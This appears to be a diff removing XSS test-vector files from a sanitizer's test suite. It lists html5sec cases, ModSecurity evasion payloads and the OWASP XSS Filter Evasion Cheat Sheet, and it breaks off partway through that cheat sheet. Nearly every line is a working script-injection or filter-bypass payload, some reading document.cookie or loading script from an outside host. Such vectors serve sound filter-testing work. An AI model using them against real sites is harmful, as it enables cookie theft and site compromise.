||||
|
||||
# we reject all styles
|
||||
# test 60 TBD Obfuscation css-properties and values via ignored extra characters
|
||||
|
||||
# we reject all styles
|
||||
# test 61 TBD CSS encoding and escaping
|
||||
|
||||
# IE9 parses this as NOT-XSS
|
||||
# <x ?="foo"/><x foo="><img src=x onerror=alert(1)//"/>
|
||||
#
|
||||
#
|
||||
test 62_1 <x '="foo"><x foo='><img src=x onerror=alert(1)//'>
|
||||
|
||||
#
|
||||
# IE9 parses this as XSS
|
||||
# <!-- ="foo"><x foo --><img onerror="alert(1)//'" src="x"/>
|
||||
#
|
||||
test 62_2 <! '="foo"><x foo='><img src=x onerror=alert(2)//'>
|
||||
|
||||
#
|
||||
# IE9 parses this as XSS as previous
|
||||
#
|
||||
test 62_3 <? '="foo"><x foo='><img src=x onerror=alert(3)//'>
|
||||
|
||||
# bonus -- correctly detected
|
||||
test 62_4 <!-- '="foo"><x foo='--><img src=x onerror=alert(2)//'>
|
||||
|
||||
# bonus -- quotes reversed
|
||||
# same as 62_2
|
||||
test 62_5 <! "='foo'><x foo="><img src=x onerror=alert(2)//">
|
||||
|
||||
# bonus - use of backquotes
|
||||
test 62_5 <! `='foo'><x foo=`><img src=x onerror=alert(2)//`>
|
||||
|
||||
# bonus
|
||||
<!-- "='foo'><x -->"><img src=x onerror=alert(1)//">
|
||||
<!-- "=foo><x -->"><img src=x onerror=alert(1)//">
|
||||
<!-- "foo><x -->"><img src=x onerror=alert(1)//">
|
||||
<!-- "foo'><x -->"><img src=x onerror=alert(1)//">
|
||||
|
||||
test 63_1 <embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.↓, GC6↓,
|
||||
|
||||
test 63_2 <img src="javascript:alert(2)">
|
||||
|
||||
test 63_3 <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.
|
||||
|
||||
test 63_4 <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.
|
||||
|
||||
test 64_1 <!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
|
||||
|
||||
test 64_2 <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
|
||||
|
||||
test 65 <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
|
||||
|
||||
test 66 <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>
|
||||
|
||||
test 67 <!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)"> ]><img />
|
||||
|
||||
test 68 <doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>
|
||||
|
||||
test 69 <card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
|
||||
|
||||
test 70 <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
|
||||
|
||||
test 71 <// style=x:expression\28write(1)\29>
|
||||
|
||||
test 72 <form><button formaction="javascript:alert(1)">X</button>
|
||||
|
||||
test 73 <event-source src="event.php" onload="alert(1)">
|
||||
|
||||
test 74 <a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
|
||||
|
||||
test 75 <script<{alert(1)}/></script </>
|
||||
|
||||
test 76_1 <?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
|
||||
|
||||
test 72_2 <!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='alert(1)'/>">
|
||||
|
||||
test 77 <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
|
||||
|
||||
test 78 <?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
|
||||
|
||||
test 79 <object allowscriptaccess="always" data="test.swf"></object>
|
||||
|
||||
# test 80 TBD IE6 and halfwidth/fullwidth Unicode characters
|
||||
|
||||
test 81 <x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
|
||||
|
||||
test 82 <?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
|
||||
|
||||
test 83 <x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
|
||||
|
||||
test 84 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x
|
||||
|
||||
test 85 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
|
||||
|
||||
test 86 <script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>
|
||||
|
||||
test 86 <body oninput=alert(1)><input autofocus>
|
||||
|
||||
test 87 <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)">
|
||||
|
||||
test 88_0 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
test 88_1 <animation xlink:href="javascript:alert(1)"/>
|
||||
test 88_2 <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
|
||||
test 88_3 <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
|
||||
test 88_4 <foreignObject xlink:href="javascript:alert(1)"/>
|
||||
test 88_5 <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
|
||||
|
||||
test 89_1 <set attributeName="onmouseover" to="alert(1)"/>
|
||||
|
||||
test 89_2 <animate attributeName="onunload" to="alert(1)"/>
|
||||
|
||||
test 90_1 <div style=content:url(test2.svg)></div>
|
||||
test 90_2 <div style="background:url(test5.svg)">PRESS ENTER</div>
|
||||
test 90_3 <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)"> <!-- this file can be crossdomain if "action" attribute refers to an external file --> <meta http-equiv="refresh" content="1;URL=test5.svg"/> <input type="submit" autofocus="autofocus"/> </form>
|
||||
|
||||
# test 91
|
||||
test 91_1 <? foo="><script>alert(1)</script>">
|
||||
test 91_2 <! foo="><script>alert(1)</script>">
|
||||
test 91_3 </ foo="><script>alert(1)</script>">
|
||||
|
||||
# obsolete Safari 4
|
||||
#test 91_4 <? foo="><x foo='?><script>alert(1)</script>'>">
|
||||
|
||||
# obsolete Opera 11
|
||||
#test 91_5 <! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">
|
||||
|
||||
test 91_6 <%25 foo><x foo="%25><script>alert(1)</script>">
|
||||
|
||||
test 92 <div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
|
||||
|
||||
test 93 <div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
|
||||
|
||||
test 94_1 <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler>
|
||||
|
||||
test 94_2 <svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>
|
||||
|
||||
test 95_1 <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage>
|
||||
|
||||
test 95_2 <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
|
||||
|
||||
test 96_1 <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
|
||||
|
||||
test 96_2 <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
|
||||
|
||||
test 97_1 <div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML+='';</script>
|
||||
|
||||
test 97_2 <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>
|
||||
|
||||
test 98 <div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
|
||||
|
||||
test 99 XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!-- --><!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style>
|
||||
|
||||
# <img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
|
||||
#
|
||||
# normal case
|
||||
test 100_0 <img src=x onerror="alert(1)">
|
||||
|
||||
# [a]case
|
||||
test 100_1 <img%09src=x onerror="alert(1)">
|
||||
test 100_2 <img%0Asrc=x onerror="alert(1)">
|
||||
test 100_3 <img%0Csrc=x onerror="alert(1)">
|
||||
test 100_4 <img%0Dsrc=x onerror="alert(1)">
|
||||
test 100_5 <img%20src=x onerror="alert(1)">
|
||||
test 100_6 <img%47src=x onerror="alert(1)">
|
||||
test 100_7 <img%0Bsrc=x onerror="alert(1)">
|
||||
|
||||
# [b] case
|
||||
test 100_8 <img %47src=x onerror="alert(1)">
|
||||
test 100_9 <img %00src=x onerror="alert(1)">
|
||||
|
||||
# [c] case
|
||||
test 100_10 <img src=x onerror%09="alert(1)">
|
||||
test 100_11 <img src=x onerror%0A="alert(1)">
|
||||
test 100_12 <img src=x onerror%0C="alert(1)">
|
||||
test 100_13 <img src=x onerror%0D="alert(1)">
|
||||
test 100_14 <img src=x onerror%20="alert(1)">
|
||||
test 100_15 <img src=x onerror%00="alert(1)">
|
||||
test 100_16 <img src=x onerror%0B="alert(1)">
|
||||
|
||||
# [d] case
|
||||
test 100_17 <img src=x%09onerror="alert(1)">
|
||||
test 100_18 <img src=x%0Aonerror="alert(1)">
|
||||
test 100_19 <img src=x%0Conerror="alert(1)">
|
||||
test 100_20 <img src=x%0Donerror="alert(1)">
|
||||
test 100_21 <img src=x%20onerror="alert(1)">
|
||||
test 100_22 <img src=x%0Bonerror="alert(1)">
|
||||
|
||||
# [e] case
|
||||
test 100_23 <img src=x onerror=%09"alert(1)">
|
||||
test 100_24 <img src=x onerror=%0A"alert(1)">
|
||||
test 100_25 <img src=x onerror=%0C"alert(1)">
|
||||
test 100_26 <img src=x onerror=%0D"alert(1)">
|
||||
test 100_27 <img src=x onerror=%20"alert(1)">
|
||||
test 100_28 <img src=x onerror=%00"alert(1)">
|
||||
test 100_29 <img src=x onerror=%0B"alert(1)">
|
||||
|
||||
# <a href="[a]java[b]script[c]:alert(1)">XXX</a>
|
||||
test 101_x <a href="javascript:alert(1)">XXX</a>
|
||||
test 101_0 <a href="%00javascript:alert(1)">XXX</a>
|
||||
test 101_1 <a href="%01javascript:alert(1)">XXX</a>
|
||||
test 101_2 <a href="%02javascript:alert(1)">XXX</a>
|
||||
test 101_3 <a href="%03javascript:alert(1)">XXX</a>
|
||||
test 101_4 <a href="%04javascript:alert(1)">XXX</a>
|
||||
test 101_5 <a href="%05javascript:alert(1)">XXX</a>
|
||||
test 101_6 <a href="%06javascript:alert(1)">XXX</a>
|
||||
test 101_7 <a href="%07javascript:alert(1)">XXX</a>
|
||||
test 101_8 <a href="%08javascript:alert(1)">XXX</a>
|
||||
test 101_9 <a href="%09javascript:alert(1)">XXX</a>
|
||||
test 101_10 <a href="%0Ajavascript:alert(1)">XXX</a>
|
||||
test 101_11 <a href="%0Bjavascript:alert(1)">XXX</a>
|
||||
test 101_12 <a href="%0Cjavascript:alert(1)">XXX</a>
|
||||
test 101_13 <a href="%0Djavascript:alert(1)">XXX</a>
|
||||
test 101_14 <a href="%0Ejavascript:alert(1)">XXX</a>
|
||||
test 101_15 <a href="%0Fjavascript:alert(1)">XXX</a>
|
||||
test 101_16 <a href="%10javascript:alert(1)">XXX</a>
|
||||
test 101_17 <a href="%11javascript:alert(1)">XXX</a>
|
||||
test 101_18 <a href="%12javascript:alert(1)">XXX</a>
|
||||
test 101_19 <a href="%13javascript:alert(1)">XXX</a>
|
||||
test 101_20 <a href="%14javascript:alert(1)">XXX</a>
|
||||
test 101_21 <a href="%15javascript:alert(1)">XXX</a>
|
||||
test 101_22 <a href="%16javascript:alert(1)">XXX</a>
|
||||
test 101_23 <a href="%17javascript:alert(1)">XXX</a>
|
||||
test 101_24 <a href="%18javascript:alert(1)">XXX</a>
|
||||
test 101_25 <a href="%19javascript:alert(1)">XXX</a>
|
||||
test 101_26 <a href="%1Ajavascript:alert(1)">XXX</a>
|
||||
test 101_27 <a href="%1Bjavascript:alert(1)">XXX</a>
|
||||
test 101_28 <a href="%1Cjavascript:alert(1)">XXX</a>
|
||||
test 101_29 <a href="%1Djavascript:alert(1)">XXX</a>
|
||||
test 101_30 <a href="%1Ejavascript:alert(1)">XXX</a>
|
||||
test 101_31 <a href="%1Fjavascript:alert(1)">XXX</a>
|
||||
test 101_32 <a href="%20javascript:alert(1)">XXX</a>
|
||||
|
||||
# B -- other cases are obsolete
|
||||
test 101_33 <a href="j%00avascript:alert(1)">XXX</a>
|
||||
|
||||
# Confirmed in IE8, Does not work in IE9+
|
||||
test 102 <img src="x` `<script>alert(1)</script>"` `>
|
||||
|
||||
test 103 <script>history.pushState(0,0,'/i/am/somewhere_else');</script>
|
||||
|
||||
test 104 <svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>
|
||||
|
||||
test 105 <iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
|
||||
|
||||
# Safari 4, supported 2005-2010, now obsolete
|
||||
# test 106 <img src onerror /" '"= alt=alert(1)//">
|
||||
|
||||
test 107 <title onpropertychange=alert(1)></title><title title=></title>
|
||||
|
||||
test 108_1 <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">
|
||||
|
||||
test 108_2 <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
|
||||
|
||||
test 108_3 <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
|
||||
|
||||
# test 109 SVG
|
||||
|
||||
test 110_1 <svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>
|
||||
|
||||
test 110_2 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>
|
||||
|
||||
test 111 <div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
|
||||
|
||||
test 112 <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
|
||||
|
||||
test 113 <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
|
||||
|
||||
test 114 <x style="background:url('x[a];color:red;/*')">XXX</x>
|
||||
|
||||
test 115_1 <!--[if]><script>alert(1)</script -->
|
||||
test 115_2 <!--[if<img src=x onerror=alert(2)//]> -->
|
||||
|
||||
test 116_1 <import namespace="t" implementation="#default#time2">
|
||||
test 116_2 <?import namespace="t" implementation="#default#time2">
|
||||
|
||||
test 117 <a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>
|
||||
|
||||
test 118 <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div>
|
||||
|
||||
test 119 <iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
|
||||
|
||||
test 120 <a href="#" onclick="makePopups()">Spam</a>
|
||||
|
||||
# original for SVG masking
|
||||
# repurposing this as a generic "no SVG"
|
||||
test 121_1 <svg:svg>
|
||||
test 121_2 <svg>
|
||||
test 121_3 <svg:mast id="foo">
|
||||
|
||||
test 122 <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
|
||||
|
||||
# test 123 "class jacking with jquery" http://html5sec.org/#131, requires scripting
|
||||
|
||||
test 124_1 <script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10
|
||||
|
||||
test 124_2 <script src="\\example.com\foo.js"></script> // Safari 5.0
|
||||
|
||||
test 125 <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||||
|
||||
test 126_1 <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
|
||||
|
||||
test 127_2 <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
|
||||
|
||||
test 127_1 <svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>
|
||||
|
||||
test 127_2 <handler id="y">alert(1)</handler>
|
||||
|
||||
test 127_3 <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
|
||||
|
||||
test 128 <svg><style><img/src=x onerror=alert(1)// </b>
|
||||
|
||||
test 129_1 <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
|
||||
|
||||
test 129_2 <image filter='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
|
||||
|
||||
test 130_1 <math href="javascript:alert(1)">CLICKME</math>
|
||||
|
||||
test 130_2 <math><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
|
||||
|
||||
test 130_3 <math><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
|
||||
|
||||
# Obsolete FF < 10
|
||||
#test 131 TBD Drag and Drop http://html5sec.org/#131
|
||||
|
||||
test 132_1 <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
|
||||
|
||||
test 132_2 <svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image>
|
||||
|
||||
test 133 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
|
||||
|
||||
test 134_1 <xmp> <%25 </xmp> <img alt='%25></xmp><img src=xx:x onerror=alert(1)//'>
|
||||
|
||||
test 134_2 <script> x='<%25' </script> %25>/ alert(2) </script>
|
||||
|
||||
test 134_3 XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>
|
||||
|
||||
test 135 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
|
||||
|
||||
# Somewhat odd injection -- ignoring. We can ban dirname is this
|
||||
# is really a problem
|
||||
#test 136 <input name="injected" value="injected" dirname="password" />
|
||||
|
||||
test 137_1 <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />
|
||||
|
||||
test 137_2 <svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>
|
|
@ -1,7 +0,0 @@
|
|||
# Mauro Gentile
|
||||
# https://www.owasp.org/images/7/7c/Gentile_OWASP_EU_Tour_2013.pdf
|
||||
<input onfocus=write(1) autofocus>
|
||||
<form id="test" /><button form="test" formaction="javascript:alert(1)">X</button>
|
||||
<video><source onerror="alert(1)">
|
||||
<form><button><button form="test" formaction="javascript:alert(1)">X</button>
|
||||
<script/src=data
|
|
@ -1,2 +0,0 @@
|
|||
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
|
||||
<scr%00ipt>confirm(0);</scr%00ipt>
|
|
@ -1,3 +0,0 @@
|
|||
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
|
||||
|
||||
%3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E
|
|
@ -1,259 +0,0 @@
|
|||
#
|
||||
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
|
||||
# based on the RSnake original http://ha.ckers.org/xss.html
|
||||
# Retrieved on 2013-11-20
|
||||
# Much of this wildly obsolete
|
||||
#
|
||||
|
||||
# XSS Locator 2
|
||||
'';!--"<XSS>=&{()}
|
||||
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
|
||||
# Grave Accent Obfuscation
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
|
||||
# Malformed A Tags
|
||||
# (not actually malformed)
|
||||
<a onmouseover="alert(document.cookie)">xxs link</a>
|
||||
<a onmouseover=alert(document.cookie)>xxs link</a>
|
||||
|
||||
# Malformed IMG Tags
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
|
||||
# fromCharCode
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
|
||||
# Default SRC tag to get past filters that check SRC domain
|
||||
<IMG SRC=# onmouseover="alert('xxs')">
|
||||
|
||||
# Default SRC tag by leaving it empty
|
||||
# nickg; Unable to replicate in FF,Safari,Chrome 2014-01-10
|
||||
# <IMG SRC= onmouseover="alert('xxs')">
|
||||
|
||||
# Default SRC tag by leaving it out entirely
|
||||
<IMG onmouseover="alert('xxs')">
|
||||
|
||||
# Decimal HTML character references
|
||||
# obsolete?
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="/" onerror=javascript:alert('XSS')>
|
||||
|
||||
# Decimal HTML character references without trailing semicolons
|
||||
# obsolete
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="/x" onerror=javascript:alert('XSS')>
|
||||
|
||||
# Hexadecimal HTML character references without trailing semicolons
|
||||
# obsolete form
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="/" onerror=javascript:alert('XSS')>
|
||||
|
||||
# Embedded tab
|
||||
# obsolete form
|
||||
#<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="jav ascript:alert('XSS');">
|
||||
|
||||
# Embedded escaped tab
|
||||
# obsolete form
|
||||
#<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="/" onerror="jav	ascript:alert('XSS');">
|
||||
|
||||
# Embedded newline to break up XSS
|
||||
# obsolete form
|
||||
#<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
|
||||
# Embedded CR
|
||||
# obsolete form
|
||||
#<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="jav
ascript:alert('XSS');">
|
||||
|
||||
# Null
|
||||
# obsolete form
|
||||
# <IMG SRC="jav%00ascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="jav%00ascript:alert('XSS');">
|
||||
|
||||
# Spaces and meta chars before the JavaScript in images for XSS
|
||||
# obsolete form
|
||||
#<IMG SRC="  javascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="  javascript:alert('XSS');">
|
||||
|
||||
# Non-alpha-non-digit XS
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
|
||||
# this is bogus or obsolete
|
||||
# <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
|
||||
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
|
||||
# Extraneous open brackets
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
|
||||
# No closing script tags
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
|
||||
|
||||
# Protocol resolution in script tags
|
||||
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||
|
||||
# Half open HTML/JavaScript XSS vector
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
|
||||
# Double open angle brackets
|
||||
<iframe src=http://ha.ckers.org/scriptlet.html <
|
||||
|
||||
# Escaping JavaScript escapes
|
||||
# N/A
|
||||
|
||||
# End title tag
|
||||
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
||||
|
||||
# INPUT image
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
|
||||
# BODY image
|
||||
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# IMG Dynsrc
|
||||
# Wildly obsolete
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
|
||||
# IMG LOW src
|
||||
# Wildy obsolete
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
|
||||
# List-style-image
|
||||
# likely obsolete
|
||||
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
|
||||
|
||||
# VBscript in an image
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
|
||||
# Livescript (older versions of Netscape only)
|
||||
# Obsolete
|
||||
# <IMG SRC="livescript:[code]">
|
||||
|
||||
# BODY tag
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
|
||||
# BGSOUND
|
||||
<BGSOUND SRC="javascript:alert('XSS');"
|
||||
|
||||
# & JavaScript includes
|
||||
# Obsolete
|
||||
# <BR SIZE="&{alert('XSS')}">
|
||||
|
||||
# STYLE sheet
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
|
||||
# Remote style sheet
|
||||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||
|
||||
# Remote style sheet part 2
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
|
||||
# Remote style sheet part 3
|
||||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||
|
||||
# Remote style sheet part 4
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
|
||||
# STYLE tags with broken up JavaScript for XSS
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
|
||||
# STYLE attribute using a comment to break up expression
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"
|
||||
|
||||
# IMG STYLE with expression
|
||||
# N/A
|
||||
|
||||
# STYLE tag (Older versions of Netscape only)
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
|
||||
# STYLE tag using background-image
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
|
||||
# STYLE tag using background
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
|
||||
# Anonymous HTML with STYLE attribute
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
|
||||
# Local htc file
|
||||
<XSS STYLE="behavior: url(xss.htc);">
|
||||
|
||||
# META
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
|
||||
# META using data
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
|
||||
# META
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
|
||||
# IFRAME
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
|
||||
# IFRAME Event based
|
||||
